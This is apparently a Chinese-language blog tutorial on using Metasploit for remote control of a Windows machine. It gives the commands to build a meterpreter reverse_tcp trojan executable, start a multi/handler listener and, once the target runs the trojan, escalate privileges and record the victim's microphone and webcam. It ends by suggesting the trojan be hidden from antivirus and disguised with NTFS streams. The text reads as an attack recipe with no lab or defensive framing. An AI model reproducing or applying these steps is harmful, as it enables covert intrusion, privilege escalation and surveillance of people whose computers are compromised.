metasploit之远程控制

metasploit是一个开源的功能强大的安全漏洞检测工具,也是非常厉害的渗透测试工具。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。

这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。

我们可以下载Windows版本进行安装,官方网站http://www.metasploit.com/

也可以利用kali linux自带的,无需安装。

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式


metasploit之远程控制_第1张图片

这里我们利用metasploit进行远程控制,利用他生成木马,将我们的木马运行在目标主机就ok了。

木马 控制端 服务端

0x01、制作木马

获取meterpreter,首先根据我们的ip生成一个木马

msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=55555  X > muma.exe

reverse_tcp 反向连接 (本机监听) // 是服务器来连接攻击者,返回一个SHELL
Windows常用攻击载荷:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp

0x02、使用metasploit控制端

使用msfconsole 启动metasploit的命令行模式

msfconsole
use exploit/multi/handler   #使用handler模块监听连入的backdooer
show options   #查看参数
set PAYLOAD windows/meterpreter/reverse_tcp  #设置对应的payload

此处ip和端口都填写木马对应的ip和端口

set LHOST IP
set LPORT 端口
exploit

当我们运行木马时,此时我们已经中毒


metasploit之远程控制_第2张图片

这样我们就远程连接到电脑,可以进行更为深入的操作了

sysinfo  #获取系统信息
getsystem #获取高权限
reg       #修改注册表
record_mic #音频录制
webcam_stream #摄像头视频获取
......

对于木马,我们可以做相应的免杀躲过杀毒软件的报毒,以及可以利用我们上个博客讲的NTFS流进行伪装。

你可能感兴趣的:(metasploit之远程控制)